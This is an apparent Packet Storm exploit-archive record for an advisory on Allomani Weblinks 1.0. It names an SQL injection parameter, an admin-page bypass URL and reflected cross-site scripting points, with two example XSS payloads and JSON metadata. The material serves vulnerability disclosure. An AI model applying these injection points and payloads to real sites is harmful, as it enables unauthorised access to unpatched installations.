ID PACKETSTORM:128565
Type packetstorm
Reporter indoushka
Modified 2014-10-05T00:00:00
Description
`Allomani Weblinks v1.0 Multi Vulnerability
=====================================
Author : indoushka
Vondor : http://www.allomani.com/
Dork : جميع الحقوق محفوظة لـ : اللوماني © 2014
برمجة اللوماني للخدمات البرمجية © 2006
======================================
Sql injection :
http://127.0.0.1/public_html/index.php?action=browse&cat=1 (inject her)
cpanel : http://127.0.0.1/public_html/admin.php
By Pass :
http://127.0.0.1/public_html/admin_menu.html
Cross site scripting (verified) :
Affected items
/public_html/admin.php
/public_html/go.php
URI was set to "onmouseover='prompt(929220)'bad=">
The input is reflected inside a tag parameter between double quotes.
URL encoded GET input id was set to 12'"()&%<ScRiPt >prompt(983476)</ScRiPt>
`
{"hash": "c5de0184cac4942ccc2fe7ce436c646a25025d56b9fe63519b7689b25c155ee2", "sourceHref": "https://packetstormsecurity.com/files/download/128565/allomaniweblinks-sql.txt", "title": "Allomani Weblinks 1.0 Cross Site Scripting / SQL Injection", "id": "PACKETSTORM:128565", "published": "2014-10-05T00:00:00", "description": "", "modified": "2014-10-05T00:00:00", "sourceData": "`\ufeffAllomani Weblinks v1.0 Multi Vulnerability \n===================================== \nAuthor : indoushka \nVondor : http://www.allomani.com/ \nDork : \u062c\u0645\u064a\u0639 \u0627\u0644\u062d\u0642\u0648\u0642 \u0645\u062d\u0641\u0648\u0638\u0629 \u0644\u0640 : \u0627\u0644\u0644\u0648\u0645\u0627\u0646\u064a \u00a9 2014 \n\u0628\u0631\u0645\u062c\u0629 \u0627\u0644\u0644\u0648\u0645\u0627\u0646\u064a \u0644\u0644\u062e\u062f\u0645\u0627\u062a \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0629 \u00a9 2006 \n====================================== \n \nSql injection : \n \nhttp://127.0.0.1/public_html/index.php?action=browse&cat=1 (inject her) \n \ncpanel : http://127.0.0.1/public_html/admin.php \n \nBy Pass : \n \nhttp://127.0.0.1/public_html/admin_menu.html \n \nCross site scripting (verified) : \n \nAffected items \n/public_html/admin.php \n/public_html/go.php \n \nURI was set to \"onmouseover='prompt(929220)'bad=\"> \nThe input is reflected inside a tag parameter between double quotes. \nURL encoded GET input id was set to 12'\"()&%<ScRiPt >prompt(983476)</ScRiPt> \n \n`\n", "reporter": "indoushka", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "88a808035916fe817054ec30e2c6f9ec"}, {"key": "modified", "hash": "369b9f608451f47f7fe57a45258cfd0c"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "369b9f608451f47f7fe57a45258cfd0c"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "841169f23cc6417d1cc9372dea976fab"}, {"key": "sourceData", "hash": "bb18a20c8488345c3411319de29865ce"}, {"key": "sourceHref", "hash": "286d4def4d5d831c77859b5e7b203aac"}, {"key": "title", "hash": "a67946cf05f80b1582bede5b6010d649"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/128565/Allomani-Weblinks-1.0-Cross-Site-Scripting-SQL-Injection.html", "lastseen": "2016-11-03T10:17:10", "viewCount": 0, "enchantments": {"vulnersScore": 4.3}}
{"result": {}}